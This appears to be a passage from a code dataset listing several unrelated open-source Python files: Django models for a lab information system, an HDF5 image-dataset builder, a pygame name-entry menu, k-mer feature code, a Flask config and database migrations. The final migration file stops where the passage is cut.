| code (string, lengths 2 to 1.05M) | repo_name (string, lengths 5 to 104) | path (string, lengths 4 to 251) | language (string, 1 class) | license (string, 15 classes) | size (int32, 2 to 1.05M) |
|---|---|---|---|---|---|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField
from django.utils.encoding import python_2_unicode_compatible
from transcriptic_tools import utils
from transcriptic_tools.utils import _CONTAINER_TYPES
from transcriptic_tools.enums import Temperature, CustomEnum
from django.core.exceptions import PermissionDenied
from autoprotocol import Unit
from transcriptic_tools.utils import round_volume
from db_file_storage.model_utils import delete_file, delete_file_if_needed
from helper_funcs import str_respresents_int
#create token imports
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.conf import settings
COVER_TYPES = set()
for container_type in _CONTAINER_TYPES.values():
if container_type.cover_types:
COVER_TYPES.update(container_type.cover_types)
COVER_TYPES = list(COVER_TYPES)
CONTAINER_STATUS_CHOICES = ['available','destroyed','returned','inbound','outbound','pending_destroy']
TEMPERATURE_NAMES = [temp.name for temp in Temperature]
RUN_STATUS_CHOICES = ['accepted','in_progress','complete','aborted','canceled']
ALIQUOT_EFFECT_TYPES = ['liquid_transfer_in','liquid_transfer_out','instructions']
DATA_TYPES = ['image_plate','platereader','measure']
RESOURCE_KINDS = ['Reagent','NucleicAcid']
DEFAULT_ORGANIZATION = 1
@python_2_unicode_compatible
class Organization(models.Model):
name = models.CharField(max_length=200,blank=True,
default='')
subdomain = models.CharField(max_length=200,
unique=True,
db_index=True)
users = models.ManyToManyField(User,
related_name='organizations',
related_query_name='organization',
db_constraint=True)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
def get_absolute_url(self):
return "/%s/" % self.subdomain
def __str__(self):
return self.name if self.name else 'Organization %s'%self.id
@python_2_unicode_compatible
class Project(models.Model):
name = models.CharField(max_length=200,null=True,blank=True)
bsl = models.IntegerField(default=1,blank=False,null=False)
organization = models.ForeignKey(Organization, on_delete=models.CASCADE,
related_name='projects',
related_query_name='project',
db_constraint=True,
default=DEFAULT_ORGANIZATION
)
archived_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
def get_absolute_url(self):
return "/%s/%s/runs"%(self.organization.subdomain,
self.id)
def __str__(self):
return self.name if self.name else 'Project %s'%self.id
class RunContainer(models.Model):
run = models.ForeignKey('Run', on_delete=models.CASCADE,
db_constraint=True,
related_name='run_containers',
related_query_name='run_container',
)
container = models.ForeignKey('Container', on_delete=models.CASCADE,
db_constraint=True,
related_name='run_containers',
related_query_name='run_container',
)
#the local label of the container within the run
container_label = models.CharField(max_length=200)
class Meta:
unique_together = ('run', 'container_label', )
@python_2_unicode_compatible
class Run(models.Model):
title = models.CharField(max_length=1000,null=True,blank=True)
status = models.CharField(max_length=200,
choices=zip(RUN_STATUS_CHOICES,
RUN_STATUS_CHOICES),
null=False,
default='accepted',
blank=False)
test_mode = models.BooleanField(blank=False,default=False)
project = models.ForeignKey(Project, on_delete=models.CASCADE,
related_name='runs',
related_query_name='run',
db_constraint=True
)
owner = models.ForeignKey(User)
completed_at = models.DateTimeField(null=True, blank=True)
canceled_at = models.DateTimeField(null=True, blank=True)
aborted_at = models.DateTimeField(null=True, blank=True)
started_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
flagged = models.BooleanField(default=False,null=False)
properties = JSONField(null=True,blank=True,
default=dict)
protocol = JSONField(null=True,blank=True)
#we don't know what issued means
updated_at = models.DateTimeField(auto_now=True)
containers = models.ManyToManyField('Container', related_name='runs',
related_query_name='run',
through='RunContainer',
db_constraint=True,
blank=True)
def add_container(self, container_or_container_id, label):
if isinstance(container_or_container_id,Container):
RunContainer.objects.create(run=self,
container=container_or_container_id,
container_label = label
)
else:
RunContainer.objects.create(run=self,
container_id=container_or_container_id,
container_label = label
)
def remove_container(self,container_or_container_id):
if isinstance(container_or_container_id, Container):
RunContainer.objects.filter(run=self,
container=container_or_container_id).delete()
else:
RunContainer.objects.filter(run=self,
container_id=container_or_container_id).delete()
def save(self, *args, **kw):
new_run = False
if self.id is not None:
orig_run = Run.objects.get(id=self.id)
if orig_run.protocol != self.protocol:
raise Exception("unable to edit autoprotocol on a run")
if not self.title:
self.title = self.name = 'Run %s'%self.id
#new run
else:
new_run = True
self.convert_transcriptic_resource_ids()
if not isinstance(self.properties,dict):
self.properties = {}
assert self.status in RUN_STATUS_CHOICES,\
'status \'%s\' not found in allowed options %s'%(self.status, str(RUN_STATUS_CHOICES))
super(Run, self).save(*args, **kw)
#only hit if this is a new Run
if not self.title:
self.title = self.name = 'Run %s'%self.id
super(Run, self).save(*args, **kw)
if new_run:
self.create_instructions()
self.populate_containers()
def convert_transcriptic_resource_ids(self):
for operation in self.protocol['instructions']:
if operation['op'] != 'provision': continue
if not isinstance(operation['resource_id'], basestring) or \
str_respresents_int(operation['resource_id']): continue
resource = Resource.objects.get(transcriptic_id = operation['resource_id'])
operation['resource_id'] = resource.id
def create_instructions(self):
for i, instruction_dict in enumerate(self.protocol['instructions']):
instruction = Instruction.objects.create(run = self,
operation = instruction_dict,
sequence_no = i)
def populate_containers(self):
organization = self.project.organization
for label, ref_dict in self.protocol['refs'].items():
if 'new' in ref_dict:
storage_condition = ref_dict['store']['where'] if 'store' in ref_dict else None
new_container = Container.objects.create(container_type_id = ref_dict['new'],
label = label,
test_mode = self.test_mode,
storage_condition = storage_condition,
status = 'available',
generated_by_run = self,
organization = organization
)
self.add_container(new_container, label=label)
else:
#check that the existing container belongs to this org
existing_container = Container.objects.get(id=ref_dict['id'])
if existing_container.status == 'destroyed':
raise Exception('Destroyed container referenced in run: Container id %s'%existing_container.id)
if existing_container.organization_id != self.project.organization_id:
raise PermissionDenied('Container %s doesn\'t belong to your org'%existing_container.id)
self.add_container(existing_container, label=label)
def __str__(self):
return self.title
def get_absolute_url(self):
return "/%s/%s/runs/%s"%(self.project.organization.subdomain,
self.project_id, self.id)
class Meta:
index_together = [
['project','test_mode','status']
]
@python_2_unicode_compatible
class Container(models.Model):
#transcriptic fields
container_type_id = models.CharField(max_length=200,
choices=zip(_CONTAINER_TYPES.keys(),
_CONTAINER_TYPES.keys()))
barcode = models.IntegerField(blank=True,null=True,unique=True, db_index=True)
cover = models.CharField(max_length=200,
blank=True,
null=True,
choices=zip(COVER_TYPES,
COVER_TYPES))
test_mode = models.BooleanField(blank=False,default=False)
label = models.CharField(max_length=1000,
blank=True,
default='',
db_index=True
)
#location_id
storage_condition = models.CharField(max_length=200,
choices=zip(TEMPERATURE_NAMES,TEMPERATURE_NAMES),
default=Temperature.ambient.name,
null=True,
blank=True)
status = models.CharField(max_length=200,
choices=zip(CONTAINER_STATUS_CHOICES,
CONTAINER_STATUS_CHOICES),
null=False,
default='available',
blank=False)
expires_at = models.DateTimeField(null=True, blank=True)
properties = JSONField(null=True,blank=True,
default=dict)
generated_by_run = models.ForeignKey(Run, on_delete=models.CASCADE,
related_name='generated_containers',
related_query_name='generated_container',
db_constraint=True,
null=True,
blank=True
)
organization = models.ForeignKey(Organization, on_delete=models.CASCADE,
related_name='containers',
related_query_name='container',
db_constraint=True
)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
@classmethod
def get_container_from_run_and_container_label(cls, run_id, container_label):
return cls.objects.get(run_container__run_id = run_id,
run_container__container_label = container_label)
@property
def col_count(self):
container_type = _CONTAINER_TYPES[self.container_type_id]
return container_type.col_count
@property
def row_count(self):
container_type = _CONTAINER_TYPES[self.container_type_id]
return container_type.row_count()
def well_indexes_from(self, start, num, columnwise=False):
"""
Return a list of indexes belonging to this Container starting from
the index indicated (in integer or string form) and including the
number of succeeding wells specified. Well indexes are counted from the
starting well rowwise unless columnwise is True.
Parameters
----------
start : Well, int, str
Starting well specified as a Well object, a human-readable well
index or an integer well index.
num : int
Number of wells to include in the Wellgroup.
columnwise : bool, optional
Specifies whether the wells included should be counted columnwise
instead of the default rowwise.
"""
container_type = _CONTAINER_TYPES[self.container_type_id]
start = container_type.robotize(start)
if columnwise:
row, col = container_type.decompose(start)
num_rows = self.row_count
start = col * num_rows + row
return range(start,start + num)
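# Illustrative example (not from the original source), assuming a hypothetical
# 96-well plate (8 rows x 12 columns): well_indexes_from('B1', 3, columnwise=True)
# robotizes 'B1' to rowwise index 12, decomposes it to (row=1, col=0), computes
# start = 0 * 8 + 1 = 1, and returns the columnwise positions [1, 2, 3],
# i.e. wells B1, C1, D1 in column order.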
def get_absolute_url(self):
return "/%s/containers/%s"%(self.organization.subdomain,
self.id)
def get_column_well_indexes(self, column_index_or_indexes):
if isinstance(column_index_or_indexes,list):
result = []
for column_index in column_index_or_indexes:
result += self.get_column_well_indexes(column_index)
return result
column_index = column_index_or_indexes
num_cols = self.col_count
num_rows = self.row_count
if column_index >= num_cols:
raise ValueError('column index %s is too high, only %s cols in this container'%(column_index,num_cols))
start = num_rows*column_index
return self.all_well_indexes(columnwise=True)[start:start+num_rows]
def all_well_indexes(self, columnwise=False):
"""
Return a list of indexes representing all Wells belonging to this Container.
Parameters
----------
columnwise : bool, optional
returns the WellGroup columnwise instead of rowwise (ordered by
well index).
"""
if columnwise:
num_cols = self.col_count
num_rows = self.row_count
return [row * num_cols + col
for col in xrange(num_cols)
for row in xrange(num_rows)]
else:
return range(0,self.col_count*self.row_count)
def save(self, *args, **kwargs):
if self.barcode == '':
self.barcode = None
if self.expires_at == '':
self.expires_at = None
if self.generated_by_run == '':
self.generated_by_run = None
if self.generated_by_run_id:
#check that the project of the generated run and the current org are the same
assert self.generated_by_run.project.organization_id == self.organization_id, "Can't use a container from one org in another org's run"
if not isinstance(self.properties,dict):
self.properties = {}
super(Container, self).save(*args, **kwargs)
def __str__(self):
return '%s (%s)'%(self.label,self.id) if self.label else 'Container %s'%self.id
@python_2_unicode_compatible
class Aliquot(models.Model):
name = models.CharField(max_length=200,null=True,blank=True)
container = models.ForeignKey(Container, on_delete=models.CASCADE,
related_name='aliquots',
related_query_name='aliquot',
db_constraint=True
)
well_idx = models.IntegerField(default=0,blank=False, null=False)
#this is a string to keep precision
volume_ul = models.CharField(max_length=200,null=False,default='0',blank=False)
properties = JSONField(null=True,blank=True,
default=dict)
#resource
#lot_no
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
@property
def human_index(self):
container_type = _CONTAINER_TYPES[self.container.container_type_id]
return container_type.humanize(self.well_idx)
def add_volume(self, volume_to_add):
"""
Handles volume strings, e.g. '5:nanoliter'
"""
current_volume = Unit(self.volume_ul,'microliter')
if isinstance(volume_to_add,basestring) and ':' in volume_to_add:
added_volume = Unit(volume_to_add)
else:
added_volume = Unit(volume_to_add,'microliter')
added_volume = round_volume(added_volume,2)
#instruments have at most 0.01 uL precision (two decimal places)
new_volume = round_volume(current_volume+added_volume,2)
self.volume_ul = str(new_volume.to('microliter').magnitude)
return added_volume
def subtract_volume(self, volume_to_subtract):
"""
Handles volume strings, e.g. '5:nanoliter'
"""
if isinstance(volume_to_subtract,basestring) and ':' in volume_to_subtract:
subtracted_volume = Unit(volume_to_subtract)
else:
subtracted_volume = Unit(volume_to_subtract,'microliter')
return self.add_volume(-1*subtracted_volume)
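# Illustrative example (hypothetical values, not from the original source):
# with volume_ul = '10', add_volume('250:nanoliter') parses the unit string,
# rounds 0.25 uL to two decimal places, and stores '10.25';
# subtract_volume('250:nanoliter') negates the amount and delegates to add_volume.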
def save(self,*args, **kwargs):
if not isinstance(self.properties,dict):
self.properties = {}
super(Aliquot, self).save(*args, **kwargs)
def __str__(self):
return '%s/%s'%(self.container.label,self.well_idx)
@python_2_unicode_compatible
class Instruction(models.Model):
run = models.ForeignKey(Run,
on_delete=models.CASCADE,
related_name='instructions',
related_query_name='instruction',
db_constraint=True)
operation = JSONField(blank=True,null=True)
sequence_no = models.IntegerField(null=False,blank=False,
default=0)
started_at = models.DateTimeField(null=True, blank=True)
completed_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('run', 'sequence_no',)
def __str__(self):
return 'Instruction %s'%self.id
class DataImage(models.Model):
bytes = models.TextField()
filename = models.CharField(max_length=255)
mimetype = models.CharField(max_length=50)
class DataFile(models.Model):
bytes = models.TextField()
filename = models.CharField(max_length=255)
mimetype = models.CharField(max_length=50)
@python_2_unicode_compatible
class Data(models.Model):
name = models.CharField(max_length=200,null=True)
data_type = models.CharField(max_length=200,
choices=zip(DATA_TYPES,
DATA_TYPES),
null=False,
default=DATA_TYPES[0],
blank=False)
sequence_no = models.IntegerField(null=False,blank=False,
default=0)
#upload_to isn't used but is required
image = models.ImageField(upload_to='autolims.DataImage/bytes/filename/mimetype', null=True, blank=True)
file = models.FileField(upload_to='autolims.DataFile/bytes/filename/mimetype', null=True, blank=True)
json = JSONField(null=True,blank=True)
instruction = models.ForeignKey(Instruction,
on_delete=models.CASCADE,
related_name='data',
related_query_name='data',
db_constraint=True,
null=True,
blank=True)
run = models.ForeignKey(Run, on_delete=models.CASCADE,
related_name='data',
related_query_name='data',
db_constraint=True,
null=True,
blank=True
)
class Meta:
unique_together = ('run', 'sequence_no',)
verbose_name_plural = "data"
def save(self, *args, **kwargs):
if self.run and self.instruction and self.run_id != self.instruction.run_id:
raise Exception("Instruction must belong to the run of this data object")
super(Data, self).save(*args, **kwargs)
delete_file_if_needed(self, 'file')
delete_file_if_needed(self, 'image')
def delete(self, *args, **kwargs):
super(Data, self).delete(*args, **kwargs)
delete_file(self, 'file')
delete_file(self, 'image')
def __str__(self):
return "Data %s"%self.id
@python_2_unicode_compatible
class AliquotEffect(models.Model):
#visible in network console as aliquot_effects when loading a well at transcriptic
aliquot = models.ForeignKey(Aliquot,
on_delete=models.CASCADE,
related_name='aliquot_effects',
related_query_name='aliquot_effect',
db_constraint=True)
instruction = models.ForeignKey(Instruction, on_delete=models.CASCADE,
related_name='aliquot_effects',
related_query_name='aliquot_effect',
db_constraint=True)
data = JSONField(blank=True,null=True)
type = models.CharField(max_length=200,
choices=zip(ALIQUOT_EFFECT_TYPES,
ALIQUOT_EFFECT_TYPES),
null=False,
default=ALIQUOT_EFFECT_TYPES[0],
blank=False)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return 'Aliquot Effect %s'%self.id
@python_2_unicode_compatible
class Resource(models.Model):
name = models.CharField(max_length=200,blank=True,
default='')
description = models.TextField(blank=True,null=True)
storage_condition = models.CharField(max_length=200,
choices=zip(TEMPERATURE_NAMES,TEMPERATURE_NAMES),
default=Temperature.ambient.name,
null=True,
blank=True)
sensitivities = JSONField(null=True,blank=True,
default=list)
properties = JSONField(null=True,blank=True,
default=dict)
kind = models.CharField(max_length=200,
choices=zip(RESOURCE_KINDS,
RESOURCE_KINDS),
null=False,
default=RESOURCE_KINDS[0],
blank=False)
transcriptic_id = models.CharField(max_length=200,blank=True,null=True,
default='', db_index=True,
unique=True)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.name if self.name else 'Resource %s'%self.id
def save(self, *args, **kwargs):
if self.transcriptic_id == '':
self.transcriptic_id = None
if not isinstance(self.sensitivities,list):
self.sensitivities = []
if not isinstance(self.properties,dict):
self.properties = {}
super(Resource, self).save(*args, **kwargs)
#@python_2_unicode_compatible
#class Kit(models.Model):
#https://secure.transcriptic.com/_commercial/kits?format=json
#@python_2_unicode_compatible
#class KitItem(models.Model):
#https://secure.transcriptic.com/_commercial/kits/kit19jybkyf8ddv/kit_items?format=json
# This code is triggered whenever a new user has been created and saved to the database
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
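# Minimal usage sketch (illustrative; assumes a configured Django project, and
# the variable names below are not part of the original file):
#   user = User.objects.create_user('alice')       # post_save fires here
#   token = Token.objects.get(user=user)           # created by create_auth_token
#   org = Organization.objects.create(subdomain='acme')
#   org.users.add(user)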
| scottbecker/autolims | autolims/models.py | Python | mit | 28,120 |
import numpy
from os import listdir
from os.path import isfile, join
import h5py
from scipy import misc
rng = numpy.random.RandomState(123522)
path = '/data/lisatmp3/xukelvin/'
if __name__ == "__main__":
files = [f for f in listdir(join('train'))
if isfile(join('train', f))]
# Shuffle examples around
rng.shuffle(files)
# Create HDF5 file
# train
print "Processing Train"
train_f = h5py.File(path+'dogs_vs_cats_train.hdf5', 'w')
dt = h5py.special_dtype(vlen=numpy.dtype('uint8'))
features = train_f.create_dataset('images', (20000,), dtype=dt)
shapes = train_f.create_dataset('shapes', (20000, 3), dtype='uint16')
targets = train_f.create_dataset('labels', (20000,), dtype='uint8')
for i in xrange(0,20000):
f = files[i]
image = misc.imread(join('train', f))
target = 0 if 'cat' in f else 1
features[i] = image.flatten()
targets[i] = target
shapes[i] = image.shape
print '{:.0%}\r'.format(i / 20000.),
# val
print "Processing Validation"
val_f = h5py.File(path+'dogs_vs_cats_val.hdf5', 'w')
dt = h5py.special_dtype(vlen=numpy.dtype('uint8'))
features = val_f.create_dataset('images', (2500,), dtype=dt)
shapes = val_f.create_dataset('shapes', (2500, 3), dtype='uint16')
targets = val_f.create_dataset('labels', (2500,), dtype='uint8')
for i in xrange(20000,22500):
f = files[i]
image = misc.imread(join('train', f))
target = 0 if 'cat' in f else 1
features[i-20000] = image.flatten()
targets[i-20000] = target
shapes[i-20000] = image.shape
print '{:.0%}\r'.format((i - 20000) / 2500.),
# test
print "Processing Test"
test_f = h5py.File(path+'dogs_vs_cats_test.hdf5', 'w')
dt = h5py.special_dtype(vlen=numpy.dtype('uint8'))
features = test_f.create_dataset('images', (2500,), dtype=dt)
shapes = test_f.create_dataset('shapes', (2500, 3), dtype='uint16')
targets = test_f.create_dataset('labels', (2500,), dtype='uint8')
for i in xrange(22500,25000):
f = files[i]
image = misc.imread(join('train', f))
target = 0 if 'cat' in f else 1
features[i-22500] = image.flatten()
targets[i-22500] = target
shapes[i-22500] = image.shape
print '{:.0%}\r'.format((i - 22500) / 2500.),
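# Reading an image back (illustrative, not part of the original script): each
# flattened uint8 row can be restored using its stored shape, e.g.
#   f = h5py.File(path + 'dogs_vs_cats_train.hdf5', 'r')
#   img = f['images'][0].reshape(f['shapes'][0])   # back to (height, width, channels)
#   label = f['labels'][0]                         # 0 = cat, 1 = dog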
| kelvinxu/representation-learning | generate_dataset.py | Python | mit | 2,368 |
|
"""empty message
Revision ID: dde8a74cfffa
Revises: 0c2841d4cfcd
Create Date: 2016-07-29 17:42:17.142867
"""
# revision identifiers, used by Alembic.
revision = 'dde8a74cfffa'
down_revision = '0c2841d4cfcd'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('podcast', sa.Column('language', sa.String(length=5), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('podcast', 'language')
### end Alembic commands ###
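# To apply or roll back this revision with the standard Alembic CLI (not part
# of the generated file):
#   alembic upgrade dde8a74cfffa
#   alembic downgrade 0c2841d4cfcd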
| perna/podigger | migrations/versions/dde8a74cfffa_.py | Python | mit | 618 |
|
# -*- coding: utf-8 -*-
# !/usr/bin/python
import pygame
from classes.pre_game.pre_game_item import PreGameItem
class PreGame():
def __init__(self, screen, actions, players):
# Store the screen on this instance
self.screen = screen
self.screen_width = self.screen.get_rect().width
self.screen_height = self.screen.get_rect().height
# Actions
self.actions = actions
# existing player names
self.recent_players = players
# validation error flag
self.validation_error = False
# PreGameItems
self.pre_game_items = [
PreGameItem(
self.screen,
{'description': 'Spieler 1:'},
0,
0,
'bike-red-c'
),
PreGameItem(
self.screen,
{'description': 'Spieler 2:'},
0,
self.screen_height / 2,
'bike-blue-c'
)
]
# Set the active input (default: 0 => corresponds to the first item)
self.active_input = 0
self.pre_game_items[self.active_input].activate_input()
self.active_color = (255, 134, 48)
self.active_cursor = '_'
def update(self, deltat):
self.validate_names()
for pre_game_item in self.pre_game_items:
pre_game_item.deactivate()
pre_game_item.update(deltat)
self.pre_game_items[self.active_input].activate()
def render(self, deltat):
for pre_game_item in self.pre_game_items:
pre_game_item.render(deltat)
def handle_keypress(self, event):
if event.unicode.isalpha():
self.pre_game_items[self.active_input].append_key(event.unicode)
elif event.key == pygame.K_BACKSPACE:
self.pre_game_items[self.active_input].delete_last_char()
elif event.key == pygame.K_RETURN:
if not self.validation_error:
self.actions['success']()
elif event.key == pygame.K_ESCAPE:
self.actions['cancel']()
elif event.key == pygame.K_DOWN:
self.increment_active_item()
elif event.key == pygame.K_UP:
self.decrement_active_item()
def set_active_item(self, input_number):
self.active_input = input_number
def increment_active_item(self):
self.pre_game_items[self.active_input].deactivate_input()
if self.active_input < len(self.pre_game_items) - 1:
self.active_input += 1
else:
self.active_input = 0
self.pre_game_items[self.active_input].activate_input()
def decrement_active_item(self):
self.pre_game_items[self.active_input].deactivate_input()
if self.active_input > 0:
self.active_input -= 1
else:
self.active_input = len(self.pre_game_items) - 1
self.pre_game_items[self.active_input].activate_input()
def validate_names(self):
error = False
for pregame_item in self.pre_game_items:
if pregame_item.input_text == '':
error = True
if error:
self.validation_error = True
else:
self.validation_error = False
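# Illustrative wiring into a pygame loop (not part of this file; start_game and
# quit_game are hypothetical callbacks):
#   pre_game = PreGame(screen, {'success': start_game, 'cancel': quit_game}, [])
#   for event in pygame.event.get():
#       if event.type == pygame.KEYDOWN:
#           pre_game.handle_keypress(event)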
| timlapluie/gldsprnt | classes/pre_game/pre_game.py | Python | mit | 3,265 |
|
import numpy as np
import itertools
import time
def form_all_kmers(A,k):
"""
Given an alphabet and `k`, this forms an array
of all possible k-mers using that alphabet.
Arguments
A : list
alphabet - all possible characters
k : int
the length of subsequences you're after
Returns
beta : array
all possible kmers that can be formed by the alphabet A
"""
all_kmers = itertools.product(A,repeat=k)
return np.array([beta for beta in all_kmers])
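# Example (illustrative): form_all_kmers(['A', 'B'], 2) returns a (4, 2) array
# with one row per kmer: [['A' 'A'], ['A' 'B'], ['B' 'A'], ['B' 'B']].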
def form_all_kmers_in_string(k,x):
"""
Given a string and `k`, this forms all k-mers
that occur in that string.
Arguments
k : int
the length of the subseqeunces you're after
x : string
the string from which you'd like to form all kmers
Older code
>>> strings = np.empty((k, len(x)-k), dtype=str)
>>> x = list(x)
>>> for i in range(k):
>>> strings[i,:] = x[i:-(k-i)]
>>> # this is all the kmers
>>> return np.unique([''.join(kmer) for kmer in strings.T if '*' not in kmer])
.. note::
Code implemented is much faster than older code,
particularly since it uses list comprehensions.
"""
kmers = np.unique([x[i:i+k] for i in xrange(len(x)-k+1) if '*' not in x[i:i+k]])
return kmers
def gen_features(x,m,beta):
"""
a feature of `x` is the count in `x` of each kmer in `beta`, where the
kmers in `x` are allowed to mismatch each element of beta by `m`
mismatches.
Arguments
x : list
protein sequence
m : int
number of allowed mismatches
beta : array
all possible kmers
Returns
features : array
count in `x` of each kmer in `beta` varying by `m` mismatches.
"""
k = len(beta[0])
y = np.array([list(yi) for yi in form_all_kmers_in_string(k, x)])
b = np.array([list(bi) for bi in beta])
B = len(beta)
print "beta contains %s kmers"%B
print "the current string contains %s kmers"%len(y)
starttime = time.time()
count = np.zeros((len(beta),m),dtype=np.int16)
ms = np.arange(m).reshape(1,m)
for yi in y:
count += ((yi!=b).sum(1).reshape(B,1)<=ms)
print "Feature generation time = %.4f" % (time.time() - starttime)
return count
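# Worked example (illustrative): with beta = ['AB', 'BB'], a kmer 'AB' in x
# gives (yi != b).sum(1) == [0, 1]; compared against ms = [[0, 1]], this
# increments the count for 'AB' in both mismatch columns (<=0 and <=1) and
# the count for 'BB' only in the <=1 column.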
| rajanil/mkboost | src/mismatch.py | Python | mit | 2,433 |
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard-to-guess-key'
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
MAIL_SERVER = 'smtp.qq.com'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky]'
FLASKY_MAIL_SENDER = 'Flasky Admin <flasky@example.com>'
FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
FLASKY_POSTS_PER_PAGE = 10
FLASKY_FOLLOWERS_PER_PAGE = 10
FLASKY_COMMENTS_PER_PAGE = 10
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URI') or \
'sqlite:///' + os.path.join(basedir,'data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
WTF_CSRF_ENABLED = False
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URI') or \
'sqlite:///' + os.path.join(basedir,'data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URI') or \
'sqlite:///' + os.path.join(basedir,'data.sqlite')
config = {
'development' : DevelopmentConfig,
'testing' : TestingConfig,
'production' : ProductionConfig,
'default' : DevelopmentConfig
}
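# Typical use in an application factory (illustrative; the surrounding factory
# function is assumed, not part of this file):
#   app.config.from_object(config['development'])
#   config['development'].init_app(app)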
| chenke91/LearnFlask | config.py | Python | mit | 1,387 |
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Buffer',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('description', models.TextField()),
('refresh_rate', models.FloatField()),
('created', models.DateField()),
('updated', models.DateField()),
('state', models.BooleanField(default=True)),
('label', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Building',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('category', models.CharField(max_length=200)),
('code', models.IntegerField(default=0)),
('longitude', models.FloatField(default=0.0)),
('latitude', models.FloatField(default=0.0)),
('surface', models.FloatField(default=0.0)),
('floors', models.IntegerField(default=1)),
('volume', models.FloatField(default=0.0)),
('kWh', models.FloatField(default=0.0)),
('kWh_m2', models.IntegerField(default=0)),
('kW', models.FloatField(default=0.0)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Counter',
fields=[
('buffer_ptr', models.OneToOneField(serialize=False, auto_created=True, parent_link=True, to='myapp.Buffer', primary_key=True)),
],
options={
},
bases=('myapp.buffer',),
),
migrations.CreateModel(
name='ElectricVehicle',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('code', models.IntegerField(default=0)),
('municipality', models.CharField(max_length=200)),
('streets', models.CharField(max_length=200)),
('postcode', models.IntegerField(default=0)),
('longitude', models.IntegerField(default=1)),
('latitude', models.IntegerField(default=1)),
('map_area', models.IntegerField(default=0)),
('power', models.FloatField(default=0.0)),
('type', models.CharField(max_length=200)),
('kWh', models.FloatField(default=0.0)),
('kWh_user', models.FloatField(default=0.0)),
('total_charging_points', models.IntegerField(default=0)),
('available_charging_points', models.IntegerField(default=0)),
('tn', models.FloatField(default=0.0)),
('tn_kWh_user', models.FloatField(default=0.0)),
('euro_user', models.FloatField(default=0.0)),
('monthly_expenses', models.FloatField(default=0.0)),
('forecast_expenses', models.FloatField(default=0.0)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Plug',
fields=[
('buffer_ptr', models.OneToOneField(serialize=False, auto_created=True, parent_link=True, to='myapp.Buffer', primary_key=True)),
],
options={
},
bases=('myapp.buffer',),
),
migrations.CreateModel(
name='Sensor',
fields=[
('buffer_ptr', models.OneToOneField(serialize=False, auto_created=True, parent_link=True, to='myapp.Buffer', primary_key=True)),
],
options={
},
bases=('myapp.buffer',),
),
migrations.CreateModel(
name='StreetLighting',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Value',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('timestamp', models.DateField(auto_now_add=True)),
('metric', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='sensor',
name='values',
field=models.ManyToManyField(blank=True, to='myapp.Value', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='ampere',
field=models.OneToOneField(to='myapp.Value', related_name='7'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwatt',
field=models.OneToOneField(to='myapp.Value', related_name='1'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwh1',
field=models.OneToOneField(to='myapp.Value', related_name='2'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwh2',
field=models.OneToOneField(to='myapp.Value', related_name='3'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwh3',
field=models.OneToOneField(to='myapp.Value', related_name='4'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwhtotal',
field=models.OneToOneField(to='myapp.Value', related_name='5'),
preserve_default=True,
),
migrations.AddField(
